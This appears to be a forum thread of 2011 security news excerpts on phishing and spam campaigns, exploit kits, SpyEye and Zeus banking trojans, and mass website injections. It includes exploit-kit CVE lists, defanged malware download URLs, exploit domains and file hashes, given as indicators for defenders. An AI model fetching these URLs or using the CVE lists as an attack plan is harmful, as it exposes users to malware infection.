- http://labs.m86security.com/2011/06/malicious-linkedin-campaign/
June 3, 2011 - "... The messages look realistic, but the giveaway is the bogus link exposed when you hover over the confirm button... Remember, just because it looks legit, doesn’t mean it is."


2011-06-06, 14:44

Phoenix exploit kit updated...
- http://labs.m86security.com/2011/06/phoenix-exploit-kit-2-7-continues-to-be-updated/
June 4th, 2011 - "... As expected, the author of the exploit kit released a new version of the tool, version 2.7... The new pack 2.7 contains the following updates:
• JAVA exploit added – Java for Business JRE Trusted Method Chaining Remote Code Execution Vulnerability – CVE-2010-0840
Old exploits were removed, the exploit kit currently contains the following exploits:
• Windows Help and Support Center Protocol Handler Vulnerability – CVE-2010-1885
• Integer overflow in the AVM2 abcFile parser in Adobe Flash Player – CVE-2009-1869,
• Integer overflow in Adobe Flash Player 9 – CVE-2007-0071
• IEPeers Remote Code Execution – CVE-2009-0806
• Internet Explorer Recursive CSS Import Vulnerability – CVE-2010-3971
• PDF Exploit – collab. collectEmailInfo – CVE-2007-5659
• PDF Exploit – util.printf – CVE-2008-2992
• PDF Exploit – collab.geticon – CVE-2009-0927
• PDF Exploit – doc.media.newPlayer – CVE-2009-4324
• PDF Exploit – LibTIFF Integer Overflow – CVE-2010-0188
... cybercriminals use JAVA and PDF exploits, as they have become the most efficient and reliable attack vector."


2011-06-08, 20:00

Spam from Hotmail compromised accounts
- http://isc.sans.org/diary.html?storyid=11026
Last Updated: 2011-06-08 13:47:30 UTC - "We keep getting ongoing reports from readers about SPAM being sent from legitimate Hotmail accounts. Like web mail systems in general, Hotmail accounts are targeted to be able to send spam from "trusted" sources. If an e-mail is received from a friend or relative, you are much more likely to open and read it. These accounts are compromised via many ways, most commonly these days via phishing. The question always is if it is actually a compromised account, or just someone spoofing the "From" address. Hotmail adds some characteristic headers that can be used to identify the source as hotmail. While they may be faked of course, they allow you to narrow down the chances of the account being compromised. You should see a "Received" header from a hotmail.com host, using Microsoft SMTSVC. If the e-mail was posted via the web interface, you should also see an "X-Oritinating-IP" header, with the IP address of the sender... Next question we get: What to do if you find out your friends hotmail account was compromised? If your friend is "lucky", all that happened was a phishing attack. Your friend only needs to change the password (and of course, -all- sites he uses the same password with). Worse case: Your friend is infected with malware that stole the password. Point the friend to some decent anti-malware detection, or if you are a real good friend, help with the cleanup."

Hotmail and Windows Live Hotmail
To see the full, unmangled headers in Hotmail: http://spamcop.net/fom-serve/cache/22.html


2011-06-09, 16:51

PPI svcs - badness on the Web ...
- https://krebsonsecurity.com/2011/06/pay-per-install-a-major-source-of-badness/
June 9, 2011 - "... Pay-per-install (PPI) services are advertised on shadowy underground Web forums. Clients submit their malware—a spambot, fake antivirus software, or password-stealing Trojan to the PPI service, which in turn charges rates from $7 to $180 per thousand successful installations, depending on the requested geographic location of the desired victims. The PPI services also attract entrepreneurial malware distributors, or “affiliates,” hackers who are tasked with figuring out how to install the malware on victims’ machines. Typical installation schemes involve uploading tainted programs to public file-sharing networks; hacking legitimate websites in order to automatically download the files onto visitors; and quietly running the programs on PCs they have already compromised. Affiliates are credited only for successful installations, via a unique and static affiliate code stitched into the installer programs and communicated back to the PPI service after each install..."
> Continued here: http://www.technologyreview.com/computing/37705/page1/


2011-06-10, 15:48

SPAM Fake UPS e-mails - spread fake anti-virus
- http://nakedsecurity.sophos.com/2011/06/09/united-parcel-service-malware-attack-spreads-fake-anti-virus/
June 9, 2011 - "Email inboxes around the world are being spammed today with a malicious attack designed to infect Windows computers with a fake anti-virus attack. The emails claim to be notification from United Parcel Service (UPS) that a package is winging its way to your address. The cybercriminals behind the scheme hope that recipients will be intrigued enough to open the attached file, which can infect their computer with malware..."
(Screenshots available at the URL above.)


2011-06-16, 09:25

SpyEye targets airline - Bank Debit Cards...
- http://www.trusteer.com/blog/spyeye-trojan-targets-airline-website-accepts-bank-debit-card-payments
June 16, 2011 - "... a SpyEye configuration that targets users of two leading European airline travel Web sites: Air Berlin, the second largest airline in Germany (after Lufthansa) and AirPlus, the global provider of business travel services for companies. SpyEye exploits the user’s machine, not the websites, to carry out this fraud. The attack subjects are far from randomly selected, but are, we believe, carefully chosen for their criminal revenue potential. One site accepts debit card payments, while the other caters to business users... criminals targeting an Air Berlin traveller from these countries stand a good chance of obtaining the personal details of the user - including their date of birth, which is mandatory on the airline's site – as well as their bank account details... SpyEye is attempting to harvest confidential user information including username and password, and other data that is entered in the targeted web page. Since Air Berlin accepts bank debit card payments, the fraud potential is even more elevated... SpyEye injects code into the users' Web browser that claims to be an anti-fraud enhancement... In reality, of course, this is a cleverly-disguised attempt to -phish- user credentials from the unsuspecting customer of the AirPlus Web portal... traditional antivirus security mechanisms are largely unable to protect corporate users from becoming infected with SpyEye as it uses targeted reconnaissance combined with signature detection evasion techniques to get a foothold inside computers..."
(More detail available at the trusteer URL above.)


2011-06-16, 19:01

Exploit kit use on the rise
- http://research.zscaler.com/2011/06/incognito-exploit-kit.html
June 14, 2011 - "Exploit kits are becoming an increasingly popular means of spreading attacks... usage of the Blackhole exploit kit... targets multiple known vulnerabilities present in a victim's browser, increasing the probability of a successful compromise. Various exploit kits differ in the way they are packaged, designed and implemented. The most distinguishing factor among different exploit kits is how exploits are obfuscated, in order to bypass various security controls... noticed a significant increase in the usage of the Incognito exploit kit. Similar to the Blackhole exploit kit, Incognito also targets vulnerabilities in Java and Adobe products. Another item that stands out to differentiate among these exploit kits is the URL patterns used. Most of the time, the URL pattern remains same within a given exploit kit. A quick look at malwaredomainlist shows the usage of common patterns used in URLs associated with Incognito*... multi-level attacks targeted by exploit kits are becoming a favored choice of attackers these days. More importantly, the creation of automated tools to deliver these exploits, provides attackers with the opportunity to launch campaigns on a frequent basis, with limited technical knowledge."
(More detail at the zscaler URL above.)

Incognito exploit kit
* http://www.malwaredomainlist.com/mdl.php?search=Incognito+exploit+kit&colsearch=All&quantity=50

Blackhole exploit kit
- http://www.malwaredomainlist.com/mdl.php?search=Blackhole+exploit+kit&colsearch=All&quantity=50

Phoenix exploit kit
- http://www.malwaredomainlist.com/mdl.php?search=Phoenix+exploit+kit&colsearch=All&quantity=50


2011-06-18, 19:32

Fake job site SCAMS...
- http://blog.dynamoo.com/2011/06/fake-jobs-totaljob-eucom.html
17 June 2011 - "... fake job domain used for contacting potential money laundering mules, this time totaljob-eu .com which is a part of this long-running scam*..."
* http://blog.dynamoo.com/search/label/Lapatasker

- http://blog.dynamoo.com/2011/06/fake-jobs-cosulting-eucom-and-espana.html
17 June 2011 - "... more fake domains in the long-running "Lapatasker" series... The registration details have changed... but otherwise this is the same old attempt to recruit people for money laundering. Avoid..."


2011-06-20, 15:12

Outlook phishing SPAM...
- http://nakedsecurity.sophos.com/2011/06/20/outlook-phishing-form-spam/
June 20, 2011 - "... Have you received a message telling you that your account needs to be reconfigured, and requesting that you enter your username and password?... If you do make the mistake of opening the attached file, you will be presented with a form which asks you for all the information a remote hacker would need to access your email account... Don't make it easy for the phishers, the spammers, the identity thieves and hackers to break into your online accounts..."


2011-06-23, 05:52

11 new exploit modules "for your pwning pleasure"
- http://h-online.com/-1265361
22 June 2011 - "The Metasploit Project has released version 3.7.2 of its exploit framework. According to the developers, the latest release of the open source penetration testing tool includes "eleven new exploit modules and fifteen post modules for your pwning pleasure"... Metasploit's hashdump capabilities now allow users to easily steal password hashes... developers note that they should also be "considerably easier to crack". A new cachedump module that allows users to steal Windows cached password hashes has also been added. Other changes include remote registry commands for Meterpreter and updates to the egghunter payload to help it bypass data execution prevention (DEP)..."

... of course, the "whitehats" won't be the only ones using it.


2011-06-27, 20:05

Facebook likejacking SCAMS
- http://techblog.avira.com/2011/06/27/facebook-likejacking-scams/en/
June 27, 2011 - "A new series of likejacking scam are making large waves on Facebook. “Dad walks on Daughter… Embarrassing” is being sent in large numbers on Facebook... As soon as you click on the link, you must “LIKE” it and then you are -redirected- to a page where you have to repeat the experience. As unbelievable as it seems, I have seen people clicking more than once on the Like button with the hope that they will get to see the video... Another scam being sent is about an Italian TV star who seems to have problems with her dress... So, you clicked, now how to get rid of this embarrassing episode? You have to remove from your Wall the post, by clicking on the top right corner... nothing is free in the Internet, even if it seems so. Please think twice before clicking on some “interesting” pictures or videos."

:sad: :fear:

2011-06-29, 14:05

XSS Attack on Sina MicroBlog
- http://community.websense.com/blogs/securitylabs/archive/2011/06/29/xss-attack-on-sina-microblog.aspx
29 Jun 2011 - "... Sina Weibo is the most popular microblog service in China, with more than 100 million registered customers. Just yesterday (28 June), Sina Weibo was attacked through an XSS exploit: more than 30,000 high profile customers were affected and sent out messages containing a malicious link... Followers who click the malicious link are redirected to a page hosted on "weibo .com/pub/star", which contains an XSS exploit to allow the execution of malicious JavaScript from www .2kt .cn... Although no malicious software was installed in this campaign, Websense reminds customers to do a simple check before you click on any suspicious URL, even it comes from your best friends."

- http://nakedsecurity.sophos.com/2011/06/30/weibo-chinas-twitter-like-service-hit-by-worm/
June 30, 2011

- https://www.computerworld.com/s/article/9218052/Worm_hits_popular_Chinese_Twitter_like_service
June 30, 2011 - "... Affected posts displayed a malicious link with enticing messages like "Move a woman's heart with 100 lines of poetry" or "Software to listen to other people's phones." When the link was clicked, the user's own account would re-post and send out private messages circulating the malicious link again..."


2011-06-30, 12:39

SPAM to avoid...
- http://sunbeltblog.blogspot.com/2011/06/some-spam-to-avoid.html
June 29, 2011 - "...
1) "Facebook Survey Gift Invite"...
2) Paypal phish...
3) World of Warcraft phish mails..."

Social network SPAM growth...
- http://www.symantec.com/connect/blogs/social-network-attacks-surge
June 29, 2011 - "... Spam attacks via social networks grew dramatically between April and June 2011. Over this period, we monitored and analyzed social network spam attacks that used three popular social networking sites — Facebook, Twitter, and YouTube... Most of the spam originates from botnets... Most of these IP addresses were blacklisted by reputation-based technology because of their spam involvement. Along with bot activity, some spam samples are seen to be sent through hijacked user accounts and fake social network accounts created by the spammers... Social network spam uses legitimate email notification templates from the social networking sites. The message alleges that the user has some unread messages or pending invites and a fake link is provided. The bogus link will direct users to a website that forces the download of malicious binaries, purports to be selling cheap enhancement drugs and replica products, pushes fake gambling casino sites, or advertises online adult dating sites, etc... The most common subject lines used in this case are as follows:
Subject: Hi, you have notifications pending
Subject: Oops.. You have notifications pending
Subject: Hi, You have 1 new direct message
Subject: You have 2 direct message on Twitter!
Subject: YouTube Administration sent you a message: Your video has been approved
Subject: YouTube Administration sent you a message: Your video on the TOP of YouTube
Subject: Direct message from [removed]
Subject: Warning: Your inbox is full, message not accepted
Subject: [removed] sent you a message on Facebook..."
(Screenshots available at the Symantec URL above.)

SPAM volume - charted July 2010 - June 2011
- http://krebsonsecurity.com/wp-content/uploads/2011/07/symspam11.jpg


2011-07-01, 13:44

Hiloti trojan downloader infection rates triple in UK
- http://www.trusteer.com/blog/hiloti-trojan-downloader-infection-rates-triple-uk
June 30, 2011 - "Hiloti generic downloader is a trojan first seen in December 2008 has shown a dramatic increase in infection rates of PCs during June 2011. Hiloti is a generic malware downloader, meaning it typically downloads other malware, e.g. Zeus and SpyEye. Hiloti creates a malicious DLL in the Windows directory, and hacks the Windows registry to maintain its presence on an infected machine across a normal boot cycle. We suspect that a Hiloti-infecting campaign - which is quite likely to be a drive-by download infection - is now taking place, having started on June 20th... the Hiloti malware is surging to two to three times it previously level of infections*... the infection does not appear to be affecting the US and other international territories, suggesting that it is a carefully targeted attack on one of more UK banking portals..."
* http://www.trusteer.com/sites/default/files/hiloti.jpg


2011-07-02, 22:59

Google+ SPAM campaign...
- http://sunbeltblog.blogspot.com/2011/07/spammers-hone-in-on-google.html
July 02, 2011 - "... Sophos has found what we consider as, probably, the first crime ever targeting Google+: fake pharma spam... spammers didn't take long before they push a campaign to take advantage of Internet users badly wanting to be put in circles. It's the current "it" thing, after all. Not to mention the current perfect target of any threat attack, and spamming was the first..."
* http://nakedsecurity.sophos.com/2011/07/01/google-plus-spam/
"... clicking on the links will not take you to the new social network, but instead take you to a pharmacy website set up to sell the likes of Viagra, Cialis and Levitra to the unwary..."
(Screenshots available at the Sophos URL above.)

- https://plus.google.com/107117483540235115863/posts/PhJFJqLyRnm
Jun 29, 2011 - "We've shut down invite mechanism for the night. Insane demand... For any who wish to leave, please remember you can always exit and take your data with you by using Google Takeout. It's your data, your relationships, your identity."

Google Plus Fuss
- http://sunbeltblog.blogspot.com/2011/07/google-plus-fuss.html
July 05, 2011

- http://www.f-secure.com/weblog/archives/00002198.html
July 6, 2011 - "... Google will be deleting all private profiles after July 31*. This is related to Google+ migration..."
* http://www.google.com/support/profiles/bin/answer.py?hl=en&answer=1192471&p=public_profile


2011-07-03, 13:54

Fake Google software emails
- http://msmvps.com/blogs/spywaresucks/archive/2011/07/02/1795605.aspx
Jul 2 2011 18:51 by sandi - Filed under: Malvertizing - "These almost fooled a family member. They’re fake. The spammers do the most basic of tracking – first by including remotely hosted pictures in the email, and by embedding the victim’s email address into URLs. If you click on the link, even if you are well aware it’s fake and don’t intend to buy anything and have your internet security set to super-ultra-paranoid, they’re still going to know who clicked on that link and you’ll get even more junk..."
(Screenshots available st the URL above.)


2011-07-05, 13:38

Resurrection of MS10-087/CVE-2010-3333 In-The-Wild
- http://labs.m86security.com/2011/07/resurrection-of-cve-2010-3333-in-the-wild/
July 5, 2011 - "During the last few weeks we’ve seen massive use of the CVE-2010-3333 vulnerability for Microsoft Office. This eight months old vulnerability is used in popular documents such as a document that pretends to be “President Obama’s Speech”. Microsoft Office vulnerabilities have become very popular over the last few years and here are several samples that can be found In-The-Wild that use MS10-087 / CVE-2010-3333... The samples use different shellcodes, but as we can see, the exploit is In-The-Wild and is being used by malicious hackers..."

> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-3333
Last revised: 12/21/2010
CVSS v2 Base Score: 9.3 (HIGH)

- http://www.symantec.com/business/security_response/vulnerability.jsp?bid=44652

- http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=880


2011-07-07, 05:16

Google dumps 11+ million .co.cc sites from search results...
- http://www.theregister.co.uk/2011/07/06/google_cans_11m_dot_co_dot_cc_sites/
6 July 2011 - "Google has removed over 11 million .co.cc websites from its search engine results pages on the basis that most of them are far too "spammy"... Google classes the firm as a "freehost", and has exercised its right to block the whole domain "if we see a very large fraction of sites on a specific freehost are spammy or low-quality", according to Matt Cutts, head of Google's web spam team... According to a recent report from the Anti-Phishing Working Group, the .cc top-level domain hosted 4,963 phishing attacks in the second half of 2010, almost twice the number found under any other extension. That was due to a large number of attacks originating from .co.cc addresses, the APWG said..."


2011-07-07, 18:14

Virus Outbreak In Progress...
- http://www.ironport.com/toc/

- http://tools.cisco.com/security/center/threatOutbreak.x?currentPage=1&sortOrder=d&pageNo=1&sortType=d

Fake Money Order Attachment - E-mail - Updated July 07, 2011
> http://tools.cisco.com/security/center/viewAlert.x?alertId=23578
Fake FedEx Package Delivery Failure - E-mail- Updated July 07, 2011
> http://tools.cisco.com/security/center/viewAlert.x?alertId=23577
Fake Legal Department Payment - E-mail - July 7, 2011
> http://tools.cisco.com/security/center/viewAlert.x?alertId=23590
Fake Credit Card Overdue - E-mail - July 07, 2011
> http://tools.cisco.com/security/center/viewAlert.x?alertId=23589
Fake USPS Package Delivery - E-mail - Updated July 07, 2011
> http://tools.cisco.com/security/center/viewAlert.x?alertId=23529
Fake UPS Package Delivery - E-mail - Updated July 07, 2011
> http://tools.cisco.com/security/center/viewAlert.x?alertId=23197


2011-07-18, 18:41

SBS hacked...
- http://www.sbs.com.au/article/124519/SBS-website-statement-July-18-2011
July 18, 2011 - "Over the last 2 days, the SBS website has been the victim of a hacking attack... this source has been able to enter the site on this occasion and has inserted a link to a third party ‘malware site’. Users who may have inadvertently visited this third party malware site could then have had their machines infected with a virus depending on their security settings. SBS recommends that any site users who may be concerned about infection run a full security scan... Our digital team has been working throughout the weekend to rectify the problem and have now resolved the problem. Investigations are ongoing regarding how this issue occurred and what steps can be taken to ensure it does not happen again..."


2011-07-19, 19:52

Virus Outbreak In Progress...
- http://www.ironport.com/toc/
July 19, 2011

- http://tools.cisco.com/security/center/threatOutbreak.x?currentPage=1&sortOrder=d&pageNo=1&sortType=d

Fake Personal Loan Notification E-mail Messages...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23677
Fake Tax Backlog Notification E-mail Messages...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23679
Fake VISA Customer Services Notification E-mail Messages...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23678
Fake Purchase Notification E-mail Messages...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23662
Fake Notification E-mail Messages...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23660
Fake Profile Picture E-mail Messages...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23663
Fake Image Screen Shot E-mail Messages...
- http://tools.cisco.com/security/center/viewAlert.x?alertId=23656


2011-07-20, 03:10

Python: No such file or directory – Your site is likely compromised
- http://blog.sucuri.net/2011/07/python-no-such-file-or-directory-your-site-is-likely-compromised.html
July 18, 2011 - "If you run a WordPress site and you are seeing the following error at the top of your pages:
sh: /usr/local/bin/python: No such file or directory
It means that it is likely compromised. How do we know that? We were tracking a large blackhat SEO spam campaign (targeting WordPress sites) and we noticed that for the last few days one of their link distrubution domains were broken and generating an error. So any hacked site would display that error instead of showing the spammy links... If you are unsure if your site is compromised, try doing a quick scan here:
http://sitecheck.sucuri.net ..."


2011-07-21, 20:22

m86 Security Report - 1H 2011
- http://www.m86security.com/documents/pdfs/security_labs/m86_security_labs_report_1h2011.pdf
July 20, 2011 - "... During this period, Web-based threats continued to grow more sophisticated. However, email threats such as spam decreased markedly following the takedown of major spam operations. Key Points:
• Many of the vulnerabilities targeted today are found in the Adobe and Java platforms. This highlights the fact that these applications often remain unpatched. Organizations and individuals should ensure that these software applications are patched promptly.
• Although spam volumes have declined since the closure of Spamit.com and takedown of the Rustock botnet, spam remains a problem for most organizations. The volume of malicious spam has returned to previous levels. Attackers continue to craft more legitimate looking messages in order to coax users into executing malicious files.
• Cybercriminals continue to experiment with combined attacks, evidenced by the recent spate of “spear-phishing” (target attacks that used Microsoft Office document files with embedded shockwave files that exploit vulnerabilities in Adobe Flash).
• There has been an increase in phishing attacks that include an HTML attachment, which is used to bypass anti-spam an anti-phishing filters in the browser.
• Facebook scams surged in the first half of 2011, as cybercriminals experimented with different ways to dupe social networkers into helping them earn a profit. One scam led users to trojans and fake anti-virus software for the Mac..."
(More detail in the PDF at the URL above.)


2011-07-21, 20:43

Fake Java Update uses victim PC's in DDoS...
- http://www.malwarecity.com/blog/fake-java-update-uses-your-pc-in-ddos-offensive-1113.html
20 July 2011 - "Software patches, allegedly missing codecs and Flash Player or Java updates have been quite often used as baits in order to lure computer users into installing malware. We have recently come across this type of malware dissembling as a regular update to the Java platform. Closer investigation on the file revealed more than meets the eye: a carefully-crafted piece of malware that is extremely viral (i.e. spreads using an array of media) and can be used as a powerful tool to initiate distributed denial-of-service attacks. This e-threat seems to be in-sync with the canvas of on-line attacks we’ve been witnessing lately, especially those attributed to the independent hacktivist groups, such as Anonymous or their spin-off (and now defunct) organization called LulzSec. Both groups made a habit of targeting a wide range of institutions, including companies and government organizations not as much for money but as part of their “Antisec” credo. Backdoor.IRCBot.ADEQ is a Trojan disguised as a Java update. It is extremely “contagious”, as it can be downloaded from a multitude of locations, most of them being legit websites that have been infected by the tool... Backdoor.IRCBot.ADEQ uses private messages in order to communicate with its master, who sends the bot an assortment of commands, including the URL of a particular website the malware needs to flood... On top of that, the bot proceeds to uninstalling other bots such as Cerberus, Blackshades, CyberGate, or OrgeneraL DDoS Bot Cryptosuite if found injected into winlogon.exe, csrss.exe and services.exe. This is an essential step for the bot to ensure that the user doesn’t suspect any malicious activity on the computer, as well as to ensure that all the other pieces of malware racing for network bandwidth won’t get it. Plus, the bot also tries to prevent the user from noticing that the Trojan is constantly sending data to the Internet. It successfully adds itself to the list of authorized applications in the Windows Firewall, and tries to kill firewall alerts issued by antivirus solutions when they pop up. This makes Backdoor.IRCBot.ADEQ an efficient DDoS tool to be used by an attacker to take down sites or hinder the activity of a particular company...In the recent security landscape, Anmonymous and LulzSec have launched a couple of DDoS attacks against high-profile institutions. While the open-source Low-Orbit Ion Cannon tools have played a role in orchestrating the incident, most of the power was provided by botnets, as most permanent members of the organization “herd” botnets ranging between 5 and 30,000 infected machines. Botnets are universal tools of trade... A company might also get blackmailed and asked to pay a specific amount of money, or their servers will automatically be flooded with connection requests which it will be unable to answer, causing it to collapse. In the meanwhile, the company loses potential customers and, implicitly, money."

Hat-tip to cnm @ spywareinfoforum.com for the link...


2011-07-22, 20:27

Fake Flash updates...
- http://sunbeltblog.blogspot.com/2011/07/correct-version-aversion.html
July 22, 2011 - "... they're hoping the victims they attract to a scam like this won't pay much attention to what they're clicking on, never mind confirm that the Flash numbering offered matches up with reality. We detect this as VirTool.Win32.Obfuscator.hg!b1 (v), another 2GCash clickfraud Trojan**, and the VirusTotal score is currently at 5/43*."
* http://www.virustotal.com/file-scan/report.html?id=ef8f8dc5bde18e428e9cef1b1293e13f93bf513688631102bab3b07287ccaa77-1311346336
File name: install.52078.exe
Submission date: 2011-07-22 14:52:16 (UTC)
Result: 5/43 (11.6%)

** http://sunbeltblog.blogspot.com/2011/07/update-center-targets-chrome-and.html


2011-07-26, 14:23

Google AdWords phishing attack...
- http://nakedsecurity.sophos.com/2011/07/26/google-adwords-phishing-attack-strikes-inboxes/
July 26, 2011 - "Have you received an email from Google saying that your Google AdWords campaign may have stopped running?... The messages have been spammed out across the internet, attempting to trick users into visiting a bogus website that pretends to be the Google AdWords login page... It's a realistic replica of the main Google AdWords page, created with some care in an attempt to phish your credentials off you. And don't forget, your same username and password will be not just used by Google AdWords, but also Gmail, Google Docs, Google+ and so forth... In short, your Google username and password are a very attractive commodity to phishers..." (from google-oa .net) That's certainly not Google, and the fact that the domain has only just been registered makes it even more suspicious..."


2011-07-27, 00:04

Mass injection - willysy .com...
- http://www.malwaredomains.com/wordpress/?p=1956
July 26th, 2011 - "Armorize reports* on a mass injection of 90,000 infected pages (not sites). The injected iframe points to willysy .com. We’ll be adding those domains on tonight’s update, but please read the article and take immediate action if you can."
* http://blog.armorize.com/2011/07/willysycom-mass-injection-ongoing.html


2011-07-27, 14:37

SpyEye's target list - US, UK, Canada, Germany, and Australia now on top
- http://www.trusteer.com/blog/us-uk-canada-germany-and-australia-now-top-spyeyes-target-list
July 26, 2011 - "Research findings from the Trusteer Situation Room and our anomaly detection service Pinpoint indicate that the number of financial institutions targeted by the SpyEye Trojan is growing. In parallel with this, our risk analysis teams have also observed an increase in the number of countries where financial institutions are being targeted by fraudsters using SpyEye. Analyzing the SpyEye command and control centers that our risk analysis team reviews every month revealed that 60% of the SpyEye bots target financial institutions in the US. This is followed by the UK with 53%, Canada with 31%, Germany 29%, and Australia 20%... the percentage of SpyEye bots targeting Canadian banks has more than doubled from 14% in May to 31% in June... SpyEye continues to expand its “hit list”... SpyEye developers appear to have figured how these defenses operate and are now constantly trying to ensure their code activity flies under the radar of these detection systems. SpyEye seems to follow Agile software development practices, namely it is flexibly and simply coded, and new configurations are being rolled out as quickly as possible by its developers. At certain times, we have even seen two new versions of the malware released every week... A new version means that the program code itself has been modified, while a new variant is just new packing around the same code... early versions of the malware included a feature to remove Zeus from an infected host machine. This feature was, of course, in place to ensure that SpyEye is the only financial malware on the infected computer..."

SpyEye Tracker
- https://spyeyetracker.abuse.ch/
"... quick statistics about the SpyEye Trojan:
SpyEye C&C servers tracked: 381
SpyEye C&C servers online: 184
SpyEye C&C server with files online: 38
• Average SpyEye binary Antivirus detection: 26.14% ..."

ZeuS Tracker
- https://zeustracker.abuse.ch/
"... quick statistics about the ZeuS crimeware:
ZeuS C&C servers tracked: 659
ZeuS C&C servers online: 223
ZeuS C&C servers with files online: 53
ZeuS FakeURLs tracked: 19
ZeuS FakeURLs online: 6
• Average ZeuS binary Antivirus detection rate: 38.67% ..."

(... as of 2011.08.04)


2011-07-29, 13:18

SPAM/fraud aimed at credit card users...
- http://community.websense.com/blogs/securitylabs/archive/2011/07/28/has-my-credit-card-really-been-compromised.aspx
28 Jul 2011 - "Websense... has been monitoring and tracking a recent wave of email attacks being spread and aimed at credit card users and holders. The attack comes in the form of a short email with fairly detailed text alerting the recipient that their credit card has been blocked, and that they should open the attached file to find out more. The format seems old, with the content and attached file properties being the distinctive factor. With the recent attacks and data breaches of organizations in the press, this seems to be worth the buzz as personal details and credit card details were part of the information leaked... There is less the wording within the message body and the header information with regards to sender address or connecting IP's which are listed in this blog post*... The file is also VM-Aware, as the resulting execution of a download for fake AV only works if host based analysis is used (as opposed to a guest virtual machine)..."
* http://garwarner.blogspot.com/2011/07/mastercard-spam-leads-to-fake-av.html

- http://labs.m86security.com/2011/07/malicious-hotel-transaction-spam/
July 29, 2011

>> http://tools.cisco.com/security/center/viewAlert.x?alertId=23741
July 29, 2011

Sophisticated injection abuses the Twitter trend service
- http://community.websense.com/blogs/securitylabs/archive/2011/07/27/sophisticated-injection-abuse-twitter-trend-service.aspx
27 Jul 2011 - "... Websense... has detected a mass injection campaign that has infected more than 10,000 Web sites. What is surprising is the size of injected code; it’s very big – over 6,000 kbs. Surely such a large injection code can contain a lot of malicious content. The attacker used 5 layers of obfuscated methods to conceal the final redirect code. The redirect target is determined based on Twitter trend services... The redirect target is different every day, and even different at day and at night... The URL redirects customers to the Blackhole Exploit Kit where a rogue AV application will be installed. Below are IP addresses that host the Blackhole Exploit Kit. ..."

:mad: :mad:

2011-07-29, 15:15

Zeus SPAM continues...
- http://garwarner.blogspot.com/2011/07/government-related-zeus-spam-continues.html
Update: New Zeus distribution site, July 29th AM:
"We are receiving SPAM emails this morning from "nacha .org" From: addresses that direct us to this Zeus distribution site.
hxxp ://federalreserve-alert .com/transaction_report.pdf.exe
... VirusTotal report... (5 of 43) detections. Only 2 of those are calling this Zeus.
July 28, 2011 - "... new example of this capability in the form of the two most recent installments of a long-running "government-related" Zeus campaign.
One of the two spammed destinations is:
alert-irs .com /00000700973770US.exe MD5 = 0691a4856713edc97664e60db735747c
This malware is currently showing a (12 of 43) detection rate at VirusTotal...
The other spammed destination is:
fdic-updates .com .com /system_update_07_28.exe MD5 = 7a0303fdb809ac0c1a84123b106992c2
This malware is currently showing a (8 of 43) detection rate at VirusTotal...
Both files are 172,032 bytes in size, but currently the FDIC one is showing a dramatically wider distribution via email than the IRS one, which may be an indication of "targeting" by the latter.
The FDIC version has been seen almost 500 times, despite the fact that the campaign is less than 45 minutes old as of this writing..."
(Much more detail at the garwarner.blogspot URL above.)

> http://www.cis.uab.edu/forensics/


2011-08-01, 14:41

willysy .com mass injection... more than 3.8 million pages
- http://blog.armorize.com/2011/07/willysycom-mass-injection-has-hit-more.html
7.31.2011 - "... As of July 31th, Google shows more than 3,410,000 (willysy) + 386,000 (exero) = 3.8 million infected pages. Note this number is for individual infected pages, -not- sites or domains. And so we've largely updated and reformatted (so new info appears at the front) the initial report*, adding to it the infection number, source IP of attack, log entries, osCommerce vulnerabilities used, and more."
* http://blog.armorize.com/2011/07/willysycom-mass-injection-ongoing.html
"... 5. Browser exploits used:
CVE-2010-0840 - Java Trust
CVE-2010-0188 - PDF LibTiff
CVE-2010-0886 - Java SMB
CVE-2006-0003 - IE MDAC
CVE-2010-1885 - HCP
6. Exploit domain:
arhyv .ru, counv .ru ...
IP: (AS51632 Ukrain - Inet Ltd)
Related domains: xlamv .ru, vntum .ru
7. Malware URL:
hxxp :// /9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot ..."

- http://www.google.com/safebrowsing/diagnostic?site=AS:51632
"... last time suspicious content was found was on 2011-08-01..."


2011-08-02, 01:14

Fake Flash for Mac ...
- http://www.f-secure.com/weblog/archives/00002206.html
August 1, 2011 - "We've come across a fake FlashPlayer.pkg installer for Mac... Once installed, the trojan adds entries to the hosts file to hijack users visiting various Google sites (e.g., Google.com.tw, Google.com.tl, et cetera) to the IP address, which is located in Netherlands. The server at the IP address displays a fake webpage designed to appear similar to the legitimate Google site... Even though the page looks fairly realistic, clicking on any of the links does not take the user to any other sites. Clicking on the links does however open new pop-up pages, which are all pulled from a separate remote server... At the time of writing, the pop-up pages aren't displaying anything, though we presume they are ads of some sort. It appears that the remote server serving the pop-up pages is down. The other remote server returning fake search requests appears to be still active. We detect this trojan as Trojan:BASH/QHost.WB."
(Screenshots available at the f-secure URL above.)


2011-08-02, 13:45

'Work from home' SPAM scam floods Twitter
- http://nakedsecurity.sophos.com/2011/08/01/compromised-twitter-accounts-spam-out-money-making-adverts/
August 1, 2011 - "Compromised Twitter accounts are once again being used by criminals to spam out adverts to unsuspecting users. In the latest attack, Direct Messages (DMs) have been sent between Twitter users promoting a "make money fast" website... Clicking on the link takes the unsuspecting recipient to a website which claims, in breathless tones, to help single mothers and teenagers to make "thousands of dollars" every day... The likelihood is, however, that all that will happen is that you end up out of pocket if you invest in the site's Home Wealth Formula. Interestingly, the website tries to attempt to customise its content to appear more attractive to you. For instance, I visited the site from Sophos's British HQ in Abingdon, Oxfordshire, and the website duly described itself as the "Abingdon Business Journal" (no such publication really exists)... there will no doubt be Twitter users who trust DMs sent to them by their friends and may click on the link, and some of them may be tempted to sign-up for the scheme...
Update: ... SPAM messages are also being sent as classic messages, not just DMs..."
(Screenshots available at the Sophos URL above.)


2011-08-03, 11:46

Cisco 2Q11 Global Threat Report
- http://blogs.cisco.com/security/cisco-2q11-global-threat-report/
August 1, 2011 - "... highlights from the Cisco 2Q11 Global Threat Report* include:
• A more than double increase in unique Web malware in the second quarter;
• Average encounter rates per enterprise peaked in March (455) and April (453);
• Companies with 5,001-10,000 employees and companies with 25,000+ employees experienced significantly higher Web malware encounters compared to other size segments;
• Brute force SQL login attempts increased significantly during the second quarter, coinciding with increased reports of SQL injection attacks throughout the period;
